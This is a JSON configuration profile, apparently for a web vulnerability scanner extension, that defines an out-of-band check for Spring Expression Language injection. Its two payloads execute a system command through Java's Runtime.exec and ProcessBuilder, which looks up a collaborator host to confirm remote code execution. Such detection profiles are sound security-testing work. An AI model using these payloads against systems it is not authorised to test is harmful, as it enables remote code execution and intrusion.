[
  {
    "ProfileName": "spel-oob",
    "Name": "",
    "Enabled": false,
    "Scanner": 1,
    "Author": "@GochaOqradze",
    "Payloads": [
      "true,T(java.lang.Runtime).getRuntime().exec(\u0027getent hosts {BC}\u0027)/wlrm",
      "true,new java.lang.ProcessBuilder({\u0027getent hosts {BC}\u0027}).start()"
    ],
    "Encoder": [],
    "UrlEncode": false,
    "CharsToUrlEncode": "",
    "Grep": [],
    "Tags": [
      "rce",
      "All"
    ],
    "PayloadResponse": false,
    "NotResponse": false,
    "TimeOut1": "",
    "TimeOut2": "",
    "isTime": false,
    "contentLength": "",
    "iscontentLength": false,
    "CaseSensitive": false,
    "ExcludeHTTP": false,
    "OnlyHTTP": false,
    "IsContentType": false,
    "ContentType": "",
    "HttpResponseCode": "",
    "NegativeCT": false,
    "IsResponseCode": false,
    "ResponseCode": "",
    "NegativeRC": false,
    "urlextension": "",
    "isurlextension": false,
    "NegativeUrlExtension": false,
    "MatchType": 0,
    "Scope": 0,
    "RedirType": 1,
    "MaxRedir": 0,
    "payloadPosition": 1,
    "payloadsFile": "",
    "grepsFile": "",
    "IssueName": "spel-oob",
    "IssueSeverity": "High",
    "IssueConfidence": "Firm",
    "IssueDetail": "spel-oob",
    "RemediationDetail": "",
    "IssueBackground": "",
    "RemediationBackground": "",
    "Header": [],
    "VariationAttributes": [],
    "InsertionPointType": [
      32,
      1,
      2,
      6,
      64,
      0,
      3,
      127
    ],
    "Scanas": false,
    "Scantype": 0,
    "pathDiscovery": false
  }
]